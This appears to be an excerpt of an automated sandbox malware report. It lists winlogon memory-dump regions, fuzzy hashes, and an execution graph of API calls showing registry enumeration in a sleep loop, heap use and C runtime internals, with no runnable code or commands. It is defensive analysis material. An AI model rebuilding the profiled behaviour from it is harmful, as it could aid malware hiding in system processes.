                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                                      • Instruction ID: ed80407fb5daa8a89b2c2114cd03d75d49824f512bc49edaa853b071e3ef9c2a
                                                                      • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                                      • Instruction Fuzzy Hash: C6115E21721B80C6EB15DB66E80419DBBA0FB88FD1F594135DE8E57765DF38D4928300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                                      • Instruction ID: 65735039a02ae73be7847ccbd44b325163db6eddf13c8e6fb7e3bc43dd32b840
                                                                      • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                                      • Instruction Fuzzy Hash: 3E115B21B21B80C5EB14DB66E80429EB7A1FB88FD0F584136DE4E57765EF38D4828700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                                      • Instruction ID: baf0a454103307751983532087e6c2e91025ef6167afbcaf99ff78595f6723a6
                                                                      • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                                      • Instruction Fuzzy Hash: 4BE03931721644DBE7148B62D80C389BBE1FB88B05F468024CD0907350EF7EC4998740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                                      • Instruction ID: 1b4ccb1bc8a883ed5caf5af7c523af9e889c3ade8bb8c485efe14556e0c68a93
                                                                      • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                                      • Instruction Fuzzy Hash: 6FE03931721644DAE7198B62D848389BAE1EB88B06F458024CD0907350EF7DD4A98740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                                      • Instruction ID: 6aab80aa31e4e9af0cd27b26063a3309ee8e182dddeca6e59f80219662625ab2
                                                                      • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                                      • Instruction Fuzzy Hash: C9E03931721644DAF7248B62D80838AB6E2EB88B05F448025CE0907360EF7DC4998740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                                      • Instruction ID: 1d3fa2e056d8ffc572ec0c138c18147de1488bc5b395315a6212ea09dd4e57df
                                                                      • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                                      • Instruction Fuzzy Hash: A9E0ED71721544DBE7189B62D80C39DBBA1FF88B15F458035CD0907310EE3984999710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                                      • Instruction ID: 32e64b29c603ca915b04ca0dc8e3b28af83467c163aa69cd46ed666c4a3aaf7e
                                                                      • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                                      • Instruction Fuzzy Hash: 02E0ED71721544DAE7199B62D84429DB6A1FF88B16F458035CD0907350EE3894A99610
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                                      • Instruction ID: c66185fb35e27ad3198e93e413a3999b506b096cf0b8d15a268b5e0317782989
                                                                      • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                                      • Instruction Fuzzy Hash: 4DE0ED71721544DAF7289B62D80429EB6A2FF88B15F448035CE0907320FE3884999610

                                                                      Execution Graph

                                                                      Execution Coverage:2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:1395
                                                                      Total number of Limit Nodes:11
                                                                      execution_graph 7466 140ae861bc4 7473 140ae861724 GetProcessHeap HeapAlloc 7466->7473 7468 140ae861bd3 7469 140ae861bda SleepEx 7468->7469 7472 140ae86159c StrCmpIW StrCmpW 7468->7472 7524 140ae8619b0 7468->7524 7470 140ae861724 50 API calls 7469->7470 7470->7468 7472->7468 7541 140ae861264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7473->7541 7475 140ae86174c 7542 140ae861000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7475->7542 7477 140ae861754 7543 140ae861264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7477->7543 7479 140ae86175d 7544 140ae861264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7479->7544 7481 140ae861766 7545 140ae861264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7481->7545 7483 140ae86176f 7546 140ae861000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7483->7546 7485 140ae861778 7547 140ae861000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7485->7547 7487 140ae861781 7548 140ae861000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7487->7548 7489 140ae86178a RegOpenKeyExW 7490 140ae8619a2 7489->7490 7491 140ae8617bc RegOpenKeyExW 7489->7491 7490->7468 7492 140ae8617e5 7491->7492 7493 140ae8617fb RegOpenKeyExW 7491->7493 7549 140ae8612b8 RegQueryInfoKeyW 7492->7549 7495 140ae861836 RegOpenKeyExW 7493->7495 7496 140ae86181f 7493->7496 7499 140ae861871 RegOpenKeyExW 7495->7499 7500 140ae86185a 7495->7500 7558 140ae86104c RegQueryInfoKeyW 7496->7558 7503 140ae861895 7499->7503 7504 140ae8618ac RegOpenKeyExW 7499->7504 7502 140ae8612b8 16 API calls 7500->7502 7505 140ae861867 RegCloseKey 7502->7505 7506 140ae8612b8 16 API calls 7503->7506 7507 140ae8618e7 RegOpenKeyExW 7504->7507 7508 140ae8618d0 7504->7508 7505->7499 7512 140ae8618a2 RegCloseKey 7506->7512 7510 140ae861922 RegOpenKeyExW 7507->7510 7511 140ae86190b 7507->7511 7509 140ae8612b8 16 API calls 7508->7509 7513 140ae8618dd RegCloseKey 7509->7513 7515 140ae861946 7510->7515 7516 140ae86195d RegOpenKeyExW 7510->7516 7514 140ae86104c 6 API calls 7511->7514 7512->7504 7513->7507 7517 140ae861918 RegCloseKey 7514->7517 7518 140ae86104c 6 API calls 7515->7518 7519 140ae861981 7516->7519 7520 140ae861998 RegCloseKey 7516->7520 7517->7510 7521 140ae861953 RegCloseKey 7518->7521 7522 140ae86104c 6 API calls 7519->7522 7520->7490 7521->7516 7523 140ae86198e RegCloseKey 7522->7523 7523->7520 7568 140ae8614a0 7524->7568 7541->7475 7542->7477 7543->7479 7544->7481 7545->7483 7546->7485 7547->7487 7548->7489 7550 140ae861486 RegCloseKey 7549->7550 7551 140ae861323 GetProcessHeap HeapAlloc 7549->7551 7550->7493 7552 140ae861472 GetProcessHeap HeapFree 7551->7552 7553 140ae86134e RegEnumValueW 7551->7553 7552->7550 7555 140ae8613a1 7553->7555 7555->7552 7555->7553 7556 140ae8613cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7555->7556 7557 140ae86141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7555->7557 7563 140ae861530 7555->7563 7556->7557 7557->7555 7559 140ae8611b5 RegCloseKey 7558->7559 7561 140ae8610bf 7558->7561 7559->7495 7560 140ae8610cf RegEnumValueW 7560->7561 7561->7559 7561->7560 7562 140ae86114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7561->7562 7562->7561 7564 140ae86154a 7563->7564 7567 140ae861580 7563->7567 7565 140ae861561 StrCmpIW 7564->7565 7566 140ae861569 StrCmpW 7564->7566 7564->7567 7565->7564 7566->7564 7567->7555 7569 140ae8614e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7568->7569 7570 140ae8614c2 GetProcessHeap HeapFree 7568->7570 7570->7569 7570->7570 8777 140ae86ae42 8778 140ae869324 _CreateFrameInfo 9 API calls 8777->8778 8780 140ae86ae4f __CxxCallCatchBlock 8778->8780 8779 140ae86ae93 RaiseException 8781 140ae86aeba 8779->8781 8780->8779 8782 140ae869978 __CxxCallCatchBlock 9 API calls 8781->8782 8786 140ae86aec2 8782->8786 8783 140ae86aeeb __CxxCallCatchBlock 8784 140ae869324 _CreateFrameInfo 9 API calls 8783->8784 8785 140ae86aefe 8784->8785 8787 140ae869324 _CreateFrameInfo 9 API calls 8785->8787 8786->8783 8788 140ae868ff8 __CxxCallCatchBlock 9 API calls 8786->8788 8789 140ae86af07 8787->8789 8788->8783 7636 140ae8747c2 7645 140ae869978 7636->7645 7638 140ae874814 __CxxCallCatchBlock 7656 140ae869324 7638->7656 7640 140ae874828 7642 140ae869324 _CreateFrameInfo 9 API calls 7640->7642 7644 140ae874838 7642->7644 7646 140ae869324 _CreateFrameInfo 9 API calls 7645->7646 7647 140ae86998a 7646->7647 7648 140ae8699c5 7647->7648 7649 140ae869324 _CreateFrameInfo 9 API calls 7647->7649 7650 140ae869995 7649->7650 7650->7648 7651 140ae869324 _CreateFrameInfo 9 API calls 7650->7651 7652 140ae8699b6 7651->7652 7652->7638 7653 140ae868ff8 7652->7653 7654 140ae869324 _CreateFrameInfo 9 API calls 7653->7654 7655 140ae869006 7654->7655 7655->7638 7659 140ae869340 7656->7659 7658 140ae86932d 7658->7640 7660 140ae86935f GetLastError 7659->7660 7661 140ae869358 7659->7661 7671 140ae869c8c 7660->7671 7661->7658 7675 140ae869aac 7671->7675 7676 140ae869b96 TlsGetValue 7675->7676 7682 140ae869af0 __vcrt_FlsAlloc 7675->7682 7677 140ae869b1e LoadLibraryExW 7679 140ae869b3f GetLastError 7677->7679 7680 140ae869bbd 7677->7680 7678 140ae869bdd GetProcAddress 7678->7676 7679->7682 7680->7678 7681 140ae869bd4 FreeLibrary 7680->7681 7681->7678 7682->7676 7682->7677 7682->7678 7683 140ae869b61 LoadLibraryExW 7682->7683 7683->7680 7683->7682 7684 140ae8681c0 7685 140ae8681c9 __scrt_acquire_startup_lock 7684->7685 7687 140ae8681cd 7685->7687 7688 140ae86bbb4 7685->7688 7689 140ae86bbd4 7688->7689 7716 140ae86bbed 7688->7716 7690 140ae86bbf2 7689->7690 7691 140ae86bbdc 7689->7691 7723 140ae86e864 7690->7723 7717 140ae86d1f4 7691->7717 7703 140ae86bc7a 7706 140ae86b994 14 API calls 7703->7706 7704 140ae86bc69 7705 140ae86d1f4 __std_exception_copy 13 API calls 7704->7705 7707 140ae86bc6e 7705->7707 7708 140ae86bc96 7706->7708 7709 140ae86d2a0 __free_lconv_num 13 API calls 7707->7709 7708->7707 7710 140ae86bcc6 7708->7710 7711 140ae86bcdf 7708->7711 7709->7716 7753 140ae86d2a0 7710->7753 7713 140ae86d2a0 __free_lconv_num 13 API calls 7711->7713 7713->7707 7715 140ae86d2a0 __free_lconv_num 13 API calls 7715->7716 7716->7687 7759 140ae86cb10 7717->7759 7720 140ae86d04c 7821 140ae86cef8 7720->7821 7724 140ae86e871 7723->7724 7728 140ae86bbf7 7723->7728 7921 140ae86cacc 7724->7921 7726 140ae86e8a0 7926 140ae86e53c 7726->7926 7729 140ae86df38 GetModuleFileNameW 7728->7729 7730 140ae86df91 7729->7730 7731 140ae86df7d GetLastError 7729->7731 7732 140ae86dd78 14 API calls 7730->7732 8117 140ae86d184 7731->8117 7734 140ae86dfbf 7732->7734 7735 140ae86dfd0 7734->7735 8122 140ae86f198 7734->8122 8126 140ae86de1c 7735->8126 7736 140ae868070 _invalid_parameter_noinfo 8 API calls 7738 140ae86bc0e 7736->7738 7741 140ae86b994 7738->7741 7740 140ae86df8a 7740->7736 7743 140ae86b9d2 7741->7743 7745 140ae86ba38 7743->7745 8143 140ae86ec1c 7743->8143 7744 140ae86bb25 7747 140ae86bb54 7744->7747 7745->7744 7746 140ae86ec1c 14 API calls 7745->7746 7746->7745 7748 140ae86bb6c 7747->7748 7752 140ae86bba4 7747->7752 7749 140ae86d220 __std_exception_copy 13 API calls 7748->7749 7748->7752 7750 140ae86bb9a 7749->7750 7751 140ae86d2a0 __free_lconv_num 13 API calls 7750->7751 7751->7752 7752->7703 7752->7704 7754 140ae86d2a5 HeapFree 7753->7754 7755 140ae86bccf 7753->7755 7754->7755 7756 140ae86d2c0 GetLastError 7754->7756 7755->7715 7757 140ae86d2cd __free_lconv_num 7756->7757 7758 140ae86d1f4 __std_exception_copy 11 API calls 7757->7758 7758->7755 7760 140ae86cb59 GetLastError 7759->7760 7763 140ae86cb2f __std_exception_copy 7759->7763 7765 140ae86cb6c 7760->7765 7761 140ae86cb8a SetLastError 7762 140ae86bbe1 7761->7762 7762->7720 7763->7762 7768 140ae86c940 GetLastError 7763->7768 7764 140ae86cb87 7764->7761 7765->7761 7765->7764 7767 140ae86c940 __std_exception_copy 11 API calls 7765->7767 7767->7764 7769 140ae86c966 7768->7769 7770 140ae86c96c SetLastError 7769->7770 7786 140ae86d220 7769->7786 7771 140ae86c9e5 7770->7771 7771->7762 7774 140ae86c9a5 FlsSetValue 7777 140ae86c9b1 FlsSetValue 7774->7777 7778 140ae86c9c8 7774->7778 7775 140ae86c995 FlsSetValue 7776 140ae86d2a0 __free_lconv_num 7 API calls 7775->7776 7780 140ae86c9a3 7776->7780 7781 140ae86d2a0 __free_lconv_num 7 API calls 7777->7781 7793 140ae86c758 7778->7793 7780->7770 7783 140ae86c9c6 SetLastError 7781->7783 7783->7771 7791 140ae86d231 __std_exception_copy 7786->7791 7787 140ae86d282 7790 140ae86d1f4 __std_exception_copy 12 API calls 7787->7790 7788 140ae86d266 HeapAlloc 7789 140ae86c987 7788->7789 7788->7791 7789->7774 7789->7775 7790->7789 7791->7787 7791->7788 7798 140ae86b470 7791->7798 7807 140ae86c630 7793->7807 7801 140ae86b4c0 7798->7801 7806 140ae86c558 EnterCriticalSection 7801->7806 7819 140ae86c558 EnterCriticalSection 7807->7819 7822 140ae86cf23 7821->7822 7829 140ae86cf94 7822->7829 7824 140ae86cf4a 7825 140ae86cf6d 7824->7825 7839 140ae86c3e0 7824->7839 7827 140ae86cf82 7825->7827 7828 140ae86c3e0 _invalid_parameter_noinfo 17 API calls 7825->7828 7827->7716 7828->7827 7852 140ae86ccc8 7829->7852 7833 140ae86cfcf 7833->7824 7840 140ae86c3ef GetLastError 7839->7840 7841 140ae86c438 7839->7841 7842 140ae86c404 7840->7842 7841->7825 7843 140ae86cba0 _invalid_parameter_noinfo 14 API calls 7842->7843 7844 140ae86c41e SetLastError 7843->7844 7844->7841 7845 140ae86c441 7844->7845 7846 140ae86c3e0 _invalid_parameter_noinfo 15 API calls 7845->7846 7847 140ae86c467 7846->7847 7892 140ae86ffe8 7847->7892 7853 140ae86cce4 GetLastError 7852->7853 7854 140ae86cd1f 7852->7854 7855 140ae86ccf4 7853->7855 7854->7833 7858 140ae86cd34 7854->7858 7865 140ae86cba0 7855->7865 7859 140ae86cd50 GetLastError SetLastError 7858->7859 7860 140ae86cd68 7858->7860 7859->7860 7860->7833 7861 140ae86d06c IsProcessorFeaturePresent 7860->7861 7862 140ae86d07f 7861->7862 7870 140ae86cd80 7862->7870 7866 140ae86cbc4 7865->7866 7867 140ae86cbc8 FlsGetValue 7865->7867 7868 140ae86cbde SetLastError 7866->7868 7869 140ae86c940 __std_exception_copy 13 API calls 7866->7869 7867->7866 7868->7854 7869->7868 7871 140ae86cdba _invalid_parameter_noinfo 7870->7871 7872 140ae86cde2 RtlCaptureContext RtlLookupFunctionEntry 7871->7872 7873 140ae86ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7872->7873 7874 140ae86ce2e RtlVirtualUnwind 7872->7874 7875 140ae86ceb6 _invalid_parameter_noinfo 7873->7875 7874->7873 7878 140ae868070 7875->7878 7880 140ae868079 7878->7880 7879 140ae868084 GetCurrentProcess TerminateProcess 7880->7879 7881 140ae868848 IsProcessorFeaturePresent 7880->7881 7882 140ae868860 7881->7882 7887 140ae86891c RtlCaptureContext 7882->7887 7888 140ae868936 RtlLookupFunctionEntry 7887->7888 7889 140ae868873 7888->7889 7890 140ae86894c RtlVirtualUnwind 7888->7890 7891 140ae868814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7889->7891 7890->7888 7890->7889 7893 140ae86c48f 7892->7893 7894 140ae870001 7892->7894 7896 140ae870054 7893->7896 7894->7893 7900 140ae870a40 7894->7900 7897 140ae86c49f 7896->7897 7898 140ae87006d 7896->7898 7897->7825 7898->7897 7918 140ae86e8c4 7898->7918 7909 140ae86cab0 7900->7909 7902 140ae870a4f 7908 140ae870a95 7902->7908 7917 140ae86c558 EnterCriticalSection 7902->7917 7908->7893 7910 140ae86cb10 __std_exception_copy 13 API calls 7909->7910 7912 140ae86cab9 7910->7912 7911 140ae86cabe 7911->7902 7912->7911 7913 140ae86cae8 FlsGetValue 7912->7913 7915 140ae86cae4 7912->7915 7913->7915 7914 140ae86cafe 7914->7902 7915->7914 7916 140ae86c940 __std_exception_copy 13 API calls 7915->7916 7916->7914 7919 140ae86cab0 _invalid_parameter_noinfo 14 API calls 7918->7919 7920 140ae86e8cd 7919->7920 7922 140ae86cae8 FlsGetValue 7921->7922 7924 140ae86cae4 7921->7924 7922->7924 7923 140ae86cafe 7923->7726 7924->7923 7925 140ae86c940 __std_exception_copy 13 API calls 7924->7925 7925->7923 7949 140ae86e7ac 7926->7949 7933 140ae86e5a7 7934 140ae86d2a0 __free_lconv_num 13 API calls 7933->7934 7946 140ae86e58e 7934->7946 7935 140ae86e5b6 7935->7935 7975 140ae86e8e0 7935->7975 7938 140ae86e6b2 7939 140ae86d1f4 __std_exception_copy 13 API calls 7938->7939 7940 140ae86e6b7 7939->7940 7942 140ae86d2a0 __free_lconv_num 13 API calls 7940->7942 7941 140ae86e70d 7944 140ae86e774 7941->7944 7986 140ae86e05c 7941->7986 7942->7946 7943 140ae86e6cc 7943->7941 7947 140ae86d2a0 __free_lconv_num 13 API calls 7943->7947 7945 140ae86d2a0 __free_lconv_num 13 API calls 7944->7945 7945->7946 7946->7728 7947->7941 7950 140ae86e7cf 7949->7950 7954 140ae86e7d9 7950->7954 8001 140ae86c558 EnterCriticalSection 7950->8001 7957 140ae86e571 7954->7957 7958 140ae86cacc 14 API calls 7954->7958 7961 140ae86e22c 7957->7961 7959 140ae86e8a0 7958->7959 7960 140ae86e53c 56 API calls 7959->7960 7960->7957 8002 140ae86dd78 7961->8002 7963 140ae86e240 7964 140ae86e25e 7963->7964 7965 140ae86e24c GetOEMCP 7963->7965 7966 140ae86e263 GetACP 7964->7966 7967 140ae86e273 7964->7967 7965->7967 7966->7967 7967->7946 7968 140ae86c5d0 7967->7968 7969 140ae86c5df __std_exception_copy 7968->7969 7970 140ae86c61b 7968->7970 7969->7970 7971 140ae86c602 HeapAlloc 7969->7971 7974 140ae86b470 __std_exception_copy 2 API calls 7969->7974 7972 140ae86d1f4 __std_exception_copy 13 API calls 7970->7972 7971->7969 7973 140ae86c619 7971->7973 7972->7973 7973->7933 7973->7935 7974->7969 7976 140ae86e22c 16 API calls 7975->7976 7977 140ae86e91b 7976->7977 7978 140ae86e958 IsValidCodePage 7977->7978 7984 140ae86ea71 7977->7984 7985 140ae86e972 _invalid_parameter_noinfo 7977->7985 7980 140ae86e969 7978->7980 7978->7984 7979 140ae868070 _invalid_parameter_noinfo 8 API calls 7981 140ae86e6a9 7979->7981 7982 140ae86e998 GetCPInfo 7980->7982 7980->7985 7981->7938 7981->7943 7982->7984 7982->7985 7984->7979 8018 140ae86e344 7985->8018 8116 140ae86c558 EnterCriticalSection 7986->8116 8003 140ae86dd97 8002->8003 8004 140ae86dd9c 8002->8004 8003->7963 8004->8003 8005 140ae86cab0 _invalid_parameter_noinfo 14 API calls 8004->8005 8006 140ae86ddb7 8005->8006 8010 140ae86ffb4 8006->8010 8011 140ae86ffc9 8010->8011 8013 140ae86ddda 8010->8013 8012 140ae870a40 _invalid_parameter_noinfo 14 API calls 8011->8012 8011->8013 8012->8013 8014 140ae870020 8013->8014 8015 140ae870035 8014->8015 8016 140ae870048 8014->8016 8015->8016 8017 140ae86e8c4 _invalid_parameter_noinfo 14 API calls 8015->8017 8016->8003 8017->8016 8019 140ae86e38f GetCPInfo 8018->8019 8020 140ae86e485 8018->8020 8019->8020 8026 140ae86e3a2 8019->8026 8021 140ae868070 _invalid_parameter_noinfo 8 API calls 8020->8021 8023 140ae86e524 8021->8023 8023->7984 8029 140ae871474 8026->8029 8030 140ae86dd78 14 API calls 8029->8030 8031 140ae8714b6 8030->8031 8049 140ae86ec58 8031->8049 8050 140ae86ec61 MultiByteToWideChar 8049->8050 8140 140ae86d1d0 8117->8140 8119 140ae86d191 __free_lconv_num 8120 140ae86d1f4 __std_exception_copy 13 API calls 8119->8120 8121 140ae86d1a1 8120->8121 8121->7740 8123 140ae86f1a9 8122->8123 8125 140ae86f1ca 8122->8125 8124 140ae86ef88 9 API calls 8123->8124 8123->8125 8124->8125 8125->7735 8127 140ae86de5b 8126->8127 8128 140ae86de40 8126->8128 8129 140ae86ece8 WideCharToMultiByte 8127->8129 8133 140ae86de60 8127->8133 8128->7740 8130 140ae86deb7 8129->8130 8132 140ae86debe GetLastError 8130->8132 8130->8133 8134 140ae86dee9 8130->8134 8131 140ae86d1f4 __std_exception_copy 13 API calls 8131->8128 8135 140ae86d184 13 API calls 8132->8135 8133->8128 8133->8131 8136 140ae86ece8 WideCharToMultiByte 8134->8136 8137 140ae86decb 8135->8137 8138 140ae86df10 8136->8138 8139 140ae86d1f4 __std_exception_copy 13 API calls 8137->8139 8138->8128 8138->8132 8139->8128 8141 140ae86cb10 __std_exception_copy 13 API calls 8140->8141 8142 140ae86d1d9 8141->8142 8142->8119 8144 140ae86eba8 8143->8144 8145 140ae86dd78 14 API calls 8144->8145 8146 140ae86ebcc 8145->8146 8146->7743 8373 140ae86ff40 8374 140ae86ff4b 8373->8374 8382 140ae872c24 8374->8382 8395 140ae86c558 